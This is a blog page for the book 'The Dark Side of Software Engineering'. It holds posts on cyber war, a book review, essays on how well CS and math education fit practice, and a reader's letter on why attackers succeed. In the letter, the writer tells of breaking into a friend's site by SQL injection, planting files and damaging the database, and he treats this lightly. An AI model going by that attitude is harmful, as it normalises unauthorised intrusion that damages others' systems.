Johann Rost

Robert L. Glass

The Dark Side of Software Engineering

Web Extras by Johann Rost and Robert L. Glass

The views expressed in this blog are solely those of the bloggers and do not represent official positions of the IEEE, the IEEE Computer Society, the IEEE Computer Society Press, or John Wiley & Sons.

Headlines in Cyber Warfare

by Robert L. Glass

Robert Glass

US Engages in an Instance of Cyber War

At the same time I was reviewing the book Cyber Wars, news came out that the US government has been engaging in cyberattacks on Iran. The attacks are designed to de-stabilize and undermine the Iranian nuclear program, which the West believes is intended to produce nuclear weapons, by such means as affecting the operational ability of 1000 to 5000 Iranian centrifuges. It is thought that the Iranian efforts may have been set back 18 months to two years by these cyberattacks, which began under President George W. Bush and have continued under President Barack Obama, according to news sources.

The cyberattack program was, of course, secret, but it became detectable because of an error in the latest version of the cyberattack code.

Note also that the US cyberattack against Iran is described in the 2012 book Confront and Control: Obama’s Secret Wars and Surprising Use of American Power by David E. Sanger. That book is apparently the source of the latest news releases about US policy described above, since it was quoted as such a source on the US news program PBS Newshour in an interview with the author of the book on June 7.

I have neither read nor intend to review this book, since it is less about computing subjects than about American policies. Note that although the title of the book implies that the cyberattack is an Obama policy, the substance of the news story said to be derived from the book says the cyberattacks are a continuation of a George W. Bush policy.

Computer Scientists Are Asked to Consider Cyber War

While there is all of this interest in Cyber War, we begin to hear from another constituency on this subject. In one of computing’s leading publications for both theorists and practitioners, Communications of the ACM (the June 2012 issue), there appears an article entitled “Why Computer Scientists Should Care About Cyber Conflict and US National Security Policy.” The title pretty well describes what the article is about, and we add here only the concluding paragraph from that article: “We are in the earliest stages of an ongoing policy debate about matters of war and peace in cyberspace, and the voice of professional computer scientists should be heard in that debate. Whatever one’s views on the topic, dialog and discussion within the computer science community about this matter can help policy makers make more informed decisions in this area.”

Google Becomes a Cyber War Combatant

At the same time the notion of Cyber War has attracted all of this attention, Google has announced that it is stepping into the fray.

The company has announced, as of early June, that it will issue a warning if it believes that state-sponsored attackers may be attempting to hack into their users’ computers or accounts. The announcement did not state how Google would recognize such “state-sponsored” attacks, but it did suggest what the notified user could do about them -- update passwords, Internet browsers, and operating systems.

It is believed that Google intends to employ the same sort of mechanism it uses for spam detection to identify these attacks.

Cyber War: A Dark Side Book Review by Robert L. Glass

Cyber War: The Next Threat to National Security and What to Do About It

By Richard A. Clarke and Robert K. Knake
Published by Harper Collins, 2010


This is a deeply disturbing book on several levels:

Robert Glass

On the first level, it postulates a serious security concern facing the United States that, it says throughout, the nation is ill-prepared to deal with.

Secondly, it presents lots of “facts” about that problem without any substantiating citations to support them.

Thirdly, it dabbles in the US political domain and tries very hard to seem relatively non-partisan -- not always with success!

So, what have we here? A book written largely by an American who has represented security concerns in both Republican and Democratic administrations over the past several decades. A book about what it calls Cyber War, a war fought not on traditional battlefields but in cyberspace, using techniques often attributed to hackers. And in that war, it discusses the fear that the US, although prepared to deal with such a war offensively, has taken almost no steps to fight that same war from a defensive point of view.

Let’s start with a bit about the author(s). Richard A. Clarke served as advisor to Presidents Ronald Reagan, both George Bushes, Bill Clinton, and Barack Obama. Although the book is frequently written in the first person, Clarke has a co-author (as noted above), and because of that when the book speaks of “I” it is at first difficult to be sure who is speaking. Because those discussions tend to be about government matters, and ones that involved the first author, it becomes clear after awhile that it is Clarke who is speaking.

Secondly, let’s talk about the War. Clarke’s concern is largely about other-nation-sponsored hackers who want to do destructive things to the cyber capabilities of the US, mostly denial of service attacks to disable such things as the US banking system, the US power grid, or even US military capabilities. He sees such governments as Russia, China, and North Korea being behind most such attacks, even when the attacks appear to be from private citizens operating out of other countries. And he even provides a ranking of world nations on what he calls “Overall Cyber War Strength,” doing a rudimentary rating system that sees North Korea, Russia, China, Iran, and the US (in that order) when rated on offensive cyber war capability, defensive capability, and dependence on cyber systems (a country such as North Korea that has little dependence on cyber systems is particularly strong -- invulnerable, even -- in that category).

Thirdly, there’s that whole political domain thing. Basically, this book seems to be Clarke’s appeal to the public for support for concerns that none of the presidents for whom he served were willing to do anything about. Much of the book is spent telling of his battles to convince various administrations that something needed to be done to beef up our Cyber defenses. In a purely non-partisan statement, he says, “Many of the things that have to be done to reduce America’s vulnerability to Cyber War are anathema to one or the other end of the political spectrum” (he notes that some of those things would require government regulation, and others would require some violations of privacy). But sometimes his pent-up partisan anger boils over, as when he notes a particularly offensive opponent of his ideas and says, “Cheney, I’m thinking of you here!”

About the lack of citations. As someone used to reading material written by academics, I have come to appreciate their writing style, where if you state a “fact” you must substantiate if with a citation to some source that allows you to state that fact with some confidence. Now there are, of course, a couple of occasions in which that approach does not work -- when no one has written about this particular subject previously (it represents original thinking), and when the source of the facts is the author himself or herself. And, to give the author of this book his due, both of those criteria could explain the lack of citations here. After all, much of what this author is discussing emerges from his time as a presidential advisor, where what was being discussed was quite likely being discussed both for the first time and by the author and his colleagues themselves.

The early parts of the book are mostly about anecdotes of Cyber War attacks, and I found myself experiencing both of those disturbing reactions I mentioned at the beginning of this review -- these are really deeply scary stories, and, since they go un-cited, are they really true? As the book went on, I overcame for the most part both of those early reactions, especially when I came to realize that much of the book is autobiographical.

There are some oddities in the book:

  • In a chapter that begins with stories of US “Cyber Warriors,” the book veers off to spend much of the chapter instead discussing China’s capabilities in this area and then concludes by saying that “the Russians are definitely better” about these approaches, without spending much time on specific Russian stories at all.
  • The author is clearly anti-Microsoft, pro open-source, and less knowledgeable about software creation than he should be. He tells stories of Bill Gates signing an agreement with the Chinese that would allow them to see and modify Windows operating system code (why would he, and why would China care?) Noting that errors in software leave open too many possibilities for Cyber War attacks, he concludes that we should produce error-free software and suggests achieving that by (a) using artificial intelligence to write such code and (b) using open source software people (he obviously thinks open sourcers are superior to other programmers).

Where does the danger in Cyber War lie? The book mentions things like “stealing information, sending out instructions that could result in moving money, spilling oil, venting gases, blowing up generators, crashing trains and airplanes, and causing missiles to detonate.” He then elaborates on such doomsday scenarios.What should we do about this? As a first level of defense, the author advocates

  • protecting the Internet backbone (there is no need to protect any individual computers if the backbone is secure)
  • protecting the power grid
  • protecting DoD networks and systems

...And then the book presents the scenario for a Cyber war game between the US and China that relies on those approaches to de-escalate the conflict.

The book ends with another oddity: It proposes two US presidential speeches: one to the US military academies at commencement time, announcing a new doctrine of Cyber Equivalence, and then another to the United Nations advocating and in fact announcing a Cyber Network security plan.

I cannot recall ever reading another book that suggested what the US president ought to say on a particular subject in a speech and to whom it should be said.

Now, is this book important, and should you read it? In spite of its flaws, and my reactions to those flaws, I think the correct answers here are “yes” and “yes.”

(Note that this book and this review are written from a US point of view. What I identify here as “scary” might not be scary to someone from another country.)

The Dark Side of Engineering Education?

Poking around in the relevant literature, Johann and I came across a book that looks at Engineering education in a fashion that’s slightly similar to the way we’ve looked at Computer Science and Math.

Robert Glass

The book is Stuff You Don’t Learn in Engineering School -- Skills for Success in the Real World, by Carl Selinger (Wiley/IEEE Press, 2004). What it addresses is engineering’s “soft skills” --  things like working in a team, setting priorities, being effective in meetings, speaking in front of a group, negotiating, dealing with stress, and even having fun (!).

Now, we would agree with the author of the book that these are important skills, particularly for engineers, who are often noted for being too techie and not very “soft.” And we are pleased that he has written a book that covers those topics.

But this is a different kettle of fish from what we are talking about. Our chosen subject is topics that academe should be teaching but is not. Most of us would agree that it is not academe’s role to teach these soft skills, I think. Certainly engineers (and, quite likely, the rest of us) need to learn these things, but I think -- and perhaps you would agree -- that academe is not the place for that to happen. Or at least not in the curriculum of an otherwise highly technical topic.

So there is nothing Dark Side about Selinger’s book. It is worthwhile, and you may want to read it for yourself, but it doesn’t warrant any further discussion on this blog.

A Research Study on What’s Important in the Field of Software Engineering

It’s important, in discussing the Rost/Glass disenchantment with academic coursework regarding its relevance to practice, to mention the work of Timothy Lethbridge [Lethbridge 2000], published over a dozen years ago.

Lethbridge, a Canadian academic, set out to study this very topic as a research project back then. He used a 75-question questionnaire, got it out to 186 practitioner participants (mostly in North America) across 24 countries, and focused on the most important (from the point of view of practitioner desirability) and unimportant courses offered in academe.

This is what he found:

Most important topics:

  • Specific programming languages
  • Data structures
  • Software design and patterns
  • Software architecture
  • Requirements gathering/analysis
  • Object-oriented topics
  • User interfaces
  • Ethics and professionalism

Least important topics

  • VLSI
  • Robotics
  • Differential equations
  • Chemistry
  • Laplace/Fourier transforms
  • Analog electronics
  • Artificial intelligence
  • Combinatorics

Summarizing what is overtaught and undertaught, Lethbridge says:

Overtaught

Calculus, differential equations, linear algebra, chemistry, and physics

Undertaught

The article provides no list of undertaught topics, but draws this important conclusion: “Many of the... important topics are not extensively taught, and some unimportant topics are extensively taught. This suggests that the education that today’s computing professionals receive may not be entirely appropriate.

Most respondents also said that they had forgotten what they learned about many topics (presumably because they had not been reinforced since then by heavy usage). Most of that forgetting had happened in theory and mathematics and the natural sciences.

The article concluded with subjects for which there was a “knowledge gap,” where the importance of a topic to practitioners exceeds their current knowledge. These included negotiation, user interfaces, leadership, real-time system design, management, software cost estimation, and a few others.

The bottom line here is this: Lethbridge’s study tends to support rather strongly the Rost/Glass impression of the relevance of academic coursework, at least in the software field. The gap between what is learned and what should be learned is far too large.

Reference:

Timothy C. Lethbridge, “What Knowledge Is Important to a Software Professional?” Computer, vol. 33, no. 5, May 2000, pp. 44-50. http://doi.ieeecomputersociety.org/10.1109/2.841783

Some New Thoughts from Prof. Lethbridge

by Timothy C. Lethbridge

Regarding my year 2000 study, I haven't personally done any follow-up, although it is on my medium-term agenda.

My article is cited by quite a lot of other papers, so it would be useful to give people an update to cite instead.

My finding that User Interfaces is the area with the greatest knowledge gap seems to have been well received. The topic became required in curriculum SE2004 for software engineering programs and is on track to be required for Computer Science programs in the 2013 update of the CS recommendations. People have told me that my paper is one of the influences that have led to this (directly or indirectly).

If I look back at the courses I took in University and the material I have learned since (out of need, or because I was teaching it), the following would be my words of wisdom:

1. Above all, doing well in SE requires “practice, practice, practice.” Simply doing a lot of development, with sufficient variety so as to keep developing new skills and learning new knowledge, is key. This suggests courses should all require lots of programming coupled with design, with the need for individual work; otherwise some team members can tend to do it all.

2. There are some useful things that I think I would not have learned easily or well if I had not been forced to learn them in a classroom or in some other structured education/training setting. These include statistics (applied, not theoretical), user interface evaluation, algorithm analysis, data structures, design of class diagrams and normalized databases, aspects of linear algebra, logic, numerical methods and grammars, and certain core domain-specific concepts that are widely useful, such as basic accounting, economics, and other business concepts. All these should be in the core of an education program.

3. There is a lot of stuff that can be learned “on the job” and with quick training courses for employees to teach them specifics: much of requirements engineering, much of project management, much of software architecture, and specifics of any particular programming language or platform. A good “general background course” will be enough for most people to get the terminology of some of these topics, and the “practice, practice, practice” concept plus some targeted reading and short seminars will allow them to pick up what they need when they need it.

4. There is a bunch of material that falls between points 3 and 4. Developers may need it in specific contexts, and learning it on the job is less likely to happen, but once people have an awareness of their lack of knowledge, they can use self-study and more in-depth training courses to bring themselves up to speed while in the workforce. This includes real-time design, the full spectrum of testing techniques (for the person who wants/needs to become an expert), and a variety of other topics.

5. The world is moving toward more agility in development, and the tools and methods for this should be integrated harmoniously into educational programs, since they can help a lot of learning happen transparently: rapid release cycles, focus on the customer's problem, test-driven development, continuous integration, etc. -- all foster self-learning.

Timothy C. Lethbridge, PhD, P.Eng., I.S.P., CSDP
Professor of Software Engineering and Computer Science
University of Ottawa, Canada

The Dark Side of Computer Science Pedagogy

This blog post regarding our book The Dark Side of Software Engineering is at the fringe of thatJohann Rost book’s subject matter. Most of the Dark Side matter in the book is on the subject of writing software and the bad things that happen during that process. This blog post, on the other hand, is about the teaching of computer science, as currently practiced in academe. Still, in my view at least, this is a legitimate dark side computing topic, because I think that what we learned in our CS courses -- that is, the inadequacy of what we learned -- could be seen as representing another dark side of our field.

Did we ever use what we learned in school?

Many years ago I graduated in Computer Science from a university in Germany. Looking back at the coursework of that school, I notice that I really only used in my professional career a ridiculously small fraction of the stuff I learned at that time:

I have never again implemented a compiler for an LR(1) language from scratch. Neither have I used the pattern recognition algorithms which were considered “advanced” at that time. I have not had to work on projects that were so close to the hardware that I had to worry about things like carry bit, trigger impulse, and shift registers. I certainly have never had to find out the minimum number of transistors necessary to implement a given Boolean function (in chip design). I remember Turing Machines, fast growing functions, and the fact that the differential equation of the strings of a guitar can be solved by separating the variables, but this material, like that I mention above, has certainly never been used in practice. I could continue, but I think you get the idea.

It's hard to quantify how much I have used out of all the stuff I learned in required CS courses, but it is a tiny fraction. It seems that the most important thing I took from my CS studies was my diploma. When I became aware of that, I felt, let’s say, a “bit disturbed.” A quick review among a few colleagues and friends revealed that their experience has not been much better than mine. Virtually none of the persons I asked used more than, say, a quarter of the stuff learned during his or her computing studies -- and most of them used much less than 10%.

Even more surprising: Although many colleagues are passing through a similar experience, there is no loud cry of “ALARM.” I wonder, what’s going wrong here? Why it is virtually impossible to define a curriculum that can be re-used in practice to a high extent -- say at least 50% or more? And why there is no broad discussion of this problem?

Why does the CS degree have any value at all?

Let’s have a look at this pedagogy/curriculum problem from the point of view of future employers of CS students -- companies that hire computing professionals.

I suppose that these companies know that the persons who graduate from a CS degree program will use only an insignificantly small fraction of the stuff they have learned there. Despite this, having graduated a CS program gives the candidate a competitive advantage over other candidates who have no such degree. I wonder why.

Why do companies prefer candidates who have a degree? What is the advantage of having graduated in CS -- since most of the knowledge learned there won’t be relevant in practice?

A personal anecdote

I don't want to close this section without sharing a personal experience that contributed a good deal to the motivation for writing this article.

When I was an undergraduate CS student in Germany, we had to take and pass a lecture with the innocent title “Logic.” You might think that therein we learned to draw “logical” conclusions. This, however, was far from the truth.

In this lecture we learned that there are some problems that have a solution and for which you can (mathematically) prove that the solution is valid (“solved problems”). For other (unsolved and open) problems, no such proof exists -- at least not yet. However, there is a third class of problems for which you can prove that proof for the solution will never ever exist. The famous problem of “squaring the circle” is an introductory example to this class of problems: there is a mathematical proof that no one will ever come up with a solution.

A great deal of the lecture covered this “interesting” third class of problems. For example, these problems can be ordered according to their difficulty. All of them are unsolvable, of course, but some of them are more difficult -- more “unsolvable” -- than others. If this concept sounds strange to you at the first glance: Don't worry, you can get used to it in time.

These proofs that a problem will never have a proof are anything but easy. How will you prove such a thing? Perhaps in 300 years a genius will come along with a completely new idea, finds a solution, and can prove it. Despite the difficulty of these proofs in the third class, they are possible, and we learned quite a few of them.

As the lecture advanced, the professor did not give us any more specific proofs for certain problems, but broadened the view and showed us methods for constructing “proofs of non-existing proofs” in general -- we went to the next level of abstraction.

The feeling when I passed the exam was beyond words -- like crossing the Antarctic. If you survive this, you won't catch a cold in windy Chicago any more. Unfortunately, not all of us survived. Of the three hundred students who tried the exam, fifteen of us passed. Those who failed this obligatory exam could repeat the test a couple of times. However, quite a few of my colleagues finally had to give up and leave the university because they simply could not get their brains around this stuff.

The anecdote is based on the specific situation in my school at the time when I was a student, so it certainly cannot be generalized. Some teachers with good reputations in their research fields had very few restrictions regarding the curriculum -- so they taught us whatever they considered really essential in life.

It was a bizarre lecture. However, let's step back and look at the problem from some distance: Given the fact that the students don't use in real life almost anything they learned at university, does it really matter if the students spend their time for one single extraordinarily difficult lecture or for ten lectures with moderate difficulty? Either way, at the end they will have spent a couple of years and will take nothing with them but their graduation document, so this bizarre lecture only highlights the general and widespread problem by driving it to the extreme.

What's your experience?

This blog post is largely based on my personal experience and opinions. I did not conduct a study of this topic, nor do I have special knowledge of curriculum design.

However, the fact that I and many of my colleagues cannot use anything of what we learned at university disturbs me. So, I invite the reader to share his or her own experiences and opinions on this topic.

The Dark Side of Mathematics Pedagogy

Robert Glass

Let’s stretch this whole matter of the dark side’s relationship to pedagogy even further than my co-author of the Dark Side book, Johann Rost, has done above.

Until Johann wrote his article, I had no idea how he felt about his computer science education. But what makes this addendum of mine at least mildly interesting is that I, independently, felt the same way about my education. Except that mine was in Mathematics!

Here’s my experience.

My undergraduate college was a very small one, with very few choices. I majored in Math there, and felt somewhat good about that (although I was never quite sure what profession one could go into with a Math degree). I was a big fish in that small pond, graduating Summa Cum Laude and wondering if I was sufficiently prepared and/or bright enough for the graduate school I had chosen to attend.

I went on to graduate school in Mathematics, choosing the University of Wisconsin as the place to do so because it had an excellent reputation in the Math field. But there was something important that I didn’t know at the time. Academically, Math divides itself into two fields -- Pure Math, for people who love Math for Math’s sake, and Applied Math, for people who want to use Math to solve problems in other fields. I quickly discovered that Pure Math wasn’t the field I wanted to go into.

Time passed, and so did I, but without the distinction I was used to in my smaller college. I decided I wasn’t cut out for the PhD I originally thought I was studying for and found a job in industry, in the suddenly burgeoning computing field into which I found I fit comfortably immediately. There is an old joke that all programmers believe they’re the world’s best (I strongly believe that’s why Open Source programmers trumpet that viewpoint about their own work so frequently), and I can certainly relate to that, since I immediately thought I was a considerably-above-average programmer! (That reminds me of another joke, in which the residents of the fictional town of Lake Woebegone, Wisconsin, believe all of their children are above average!)

In any case, when I joined industry (where I became part of the also-burgeoning space industry), I quickly found that my education (in Pure Math, you recall) had not in the slightest prepared me for the work I was going to be doing. Actually, that’s not quite true. I had taken the only two courses Wisconsin had in working with computers (this was 1952, and the whole computing thing and the whole space thing were both brand new), and those were superb preparation for the work I was to do. But none of my Math applied. At all. 0%.

Which is kind of weird. Because my job assignment was in Master Dimensions, where we mathematicians (!) used our skill to define the aircraft our company was building in mathematical terms. We measured things to a ten-thousandth of an inch, so that when the airplanes flew the pieces would fit together so well that no excess air turbulence would cause bad things to happen. We Master Dimensions folks felt exceedingly useful (although knowing what tolerances we were working to, we were always dismayed when we observed shop floor workers banging on pieces to make them fit together -- we knew, in our hearts, that they would slip together astonishingly well without banging!

Now the kind of Math we were working with here was 3-dimensional geometry. And if you know Math curricula at all, you’re no doubt aware that that’s a subject that almost no one teaches. And certainly not a school that focuses on pure math.

The more I thought about it, the more I realized that my Math studies had prepared me for almost nothing I was doing on the job, even though I was, nominally, a Mathematician! I began to realize that what my college education had been good for was a ticket of achievement, called a degree, that showed I was bright enough to learn new things, perhaps even Master Dimensions work! It turns out that I wasn’t all that good at Master Dimensions work, either, and I quickly changed fields to go full time into software work, where of course I immediately became the world’s best programmer (like all of my colleagues).

So there you are. Putting Johann’s two cents’ worth with mine, one could begin to wonder about the value of a college education. I’m not saying, and I don’t think Johann is saying, that the education -- or the degree -- wasn’t worthwhile. It’s just that I have the suspicion that it could have been so much more valuable if the academics who taught my courses had (a) known I was going to be an applied mathematician, and (b) had any idea what real-world problems actually looked like.

All of this makes me wonder if the feeling that your education didn’t properly prepare you for your professional work is universal. Perhaps it’s not CS education, or math education, that’s the problem here. Perhaps it’s academe in general. Perhaps there’s just a huge gap between the academic view and the professional view in all (or nearly all) disciplines? That makes it all the more important that you communicate with us. Did your education, no matter what its flavor/major, serve you well in being job-ready? We’d love to hear from you.

Q and A

For this entry, we share the space with a letter received in response to the book:

Hello. I recently read your book on The Dark Side of Software Engineering. It was very enjoyable and caused me to reflect upon various encounters with such issues, both within and outside software-related endeavors. In particular, I was interested in replying to a question posed at one point:

"Why is it that rank computing novices can interact with (or work against) the highest level professionals in our field to cause the kind of mischief that they do?"

I think that this problem comes down to defenders having to secure all possible approaches, while attackers need only discover a single weakness or a chain of weaknesses to succeed. In addition, attackers need not have sophisticated programming skills to succeed -- others can develop the tools for them. This essentially allows for the faster sharing of knowledge between attackers, thus raising the apparent level of even an amateur. That combines with the idea that systems tend to be built upon a common set of components. Attackers may develop a technique that opens up thousands of different systems to the same attack because they share a common weakness (e.g., SQL injection afflicted many different websites precisely because they were all built upon SQL databases). The defenders would appear to be at a disadvantage.

There are several factors that contribute to prevalence of vulnerabilities:

The majority of developers seem to have no security knowledge or to believe that security is outside the scope of their applications. Therefore, they develop components that may have security vulnerabilities, but there are no checks in place to detect them. A developer may even be aware that there are circumstances under which code fails dramatically, but he may consider that it's reasonable for the component to fail if misused. In time, that vulnerable component may become part of a much larger system that is critical. Even though much of the system may have been vetted, perhaps the vulnerable component was not. The security of the whole is weakened simply by the inclusion of a vulnerable part.

As an example, several years ago, a friend developed a website that included a feedback form. I noticed that the form would fail when the feedback included an apostrophe, and the site displayed an error message. He remarked that he would fix it later, that it was "the user's fault" if the form failed. It dawned on me that perhaps SQL injection would work on his site. I knew nothing about SQL at the time, but I'd read a two-sentence snippet in some magazine about SQL injection being a widespread issue at the time. He responded to my warning by saying it was impossible to exploit such a thing. Needless to say, he had underestimated my motivation to prove him wrong. I spent the rest of the night reading about SQL from websites and writing queries into his feedback form. By the time he was awake the next morning, I'd managed to place files on his server. I'd also mangled his database tables, but that was a forgivable accident...

Sometimes weaknesses arise from components interacting in unexpected ways, or from the expansion of components' roles. Perhaps the overall system was secure for its original purpose, but an expanded role renders it vulnerable. Consider the case of Social Security numbers in the United States. The designers of SSNs never intended for them to be secret universal IDs. As such, they were assigned following a set of rules which makes it much easier to guess a person's SSN given the right information. Worse still, it's information that tends to be publicly available. It wasn't until researchers published a paper on this that the Social Security Administration decided to change the rules; future numbers will be assigned randomly.

An example more relevant to computing would be how introducing new browser functionality affects old systems. Perhaps a forum was designed so that users could post fancy HTML content on their signatures. This allows JavaScript tags to be inserted, which in turn exposes session cookies to an attacker. Even after developers secure the forum against JavaScript, future changes to HTML might open up new attack routes. Future-proofing systems can be very difficult.

Then there are instances of users rendering their systems vulnerable. Suppose that an administrator uses his work password as his password on a casual gaming website. The website has vulnerabilities because its owners are inexperienced and have no reason to believe security is particularly important. An attacker succeeds in obtaining the administrator's password through the forum, then uses it to access other accounts, eventually escalating his access to his desired target within the administrator's company. Sophisticated security measures are pointless when the users themselves fail.

--Humberto Diaz, PhD student, University of Puerto Rico at Mayaguez
(Reprinted with the author's permission)

Response from Johann Rost, first author of The Dark Side of Software Engineering:

Thanks for your response and for your suggestions to explain the phenomenon that it appears so easy for attackers to crack even highly protected sites. I have read this idea before: the defender must be right all the time, while for the attacker it is enough to be right only once. I am not a professional in computer security; however, I am not fully convinced by these explanations.

Defenders face this problem in many places where security systems are applied: in places where gold and other precious things are kept, for example, or in prisons. Still it is always enough that attackers are right only once, yet still we rarely read stories that a group of teenagers entered Fort Knox, arranged the gold bars there in funny sculptures, and left cheeky remarks on the walls. Such things really rarely happen -- compared to the frequency with which teenagers or other persons with limited formal training in computing have entered highly secured sites -- like those of Cisco or networks owned by the US Army.

Well, it's true that that the attackers need be right only once. The defenders, however, compensate for this problem by being in complete control of the access conditions.

So, my question still remains unanswered: What makes the difference between other areas with security systems and computer security -- where high school students simply embarrass the best professionals in the field? Is it the anonymity of the Internet? Is it the complexity of the protected system? The huge number of intruding attempts which remain completely unpunished -- without any consequences for the attacker? Or what?

Showing 1 - 5 of 7 results.
Items per Page 5
of 2

About the Book

Cover image

The Dark Side of Software Engineering

Evil on Computing Projects

 

by Johann Rost and Robert L. Glass

Betrayal! Corruption! Software engineering?

Industry experts Johann Rost and Robert L. Glass explore the seamy underbelly of software engineering in this timely report on and analysis of the prevalence of subversion, lying, hacking, and espionage on every level of software project management. Based on the authors' original research and augmented by frank discussion and insights from other well-respected figures, The Dark Side of Software Engineering goes where other management studies fear to tread -- a corporate environment where schedules are fabricated, trust is betrayed, millions of dollars are lost, and there is a serious need for the kind of corrective action that this book ultimately proposes.

IEEE CS MEMBERS: Use promotion code 38491 when you check out at Wiley.com to receive your 15% member discount.

ISBN: 978-0-470-59717-0
Paperback
305 pages
$34.95 (15% member discount available)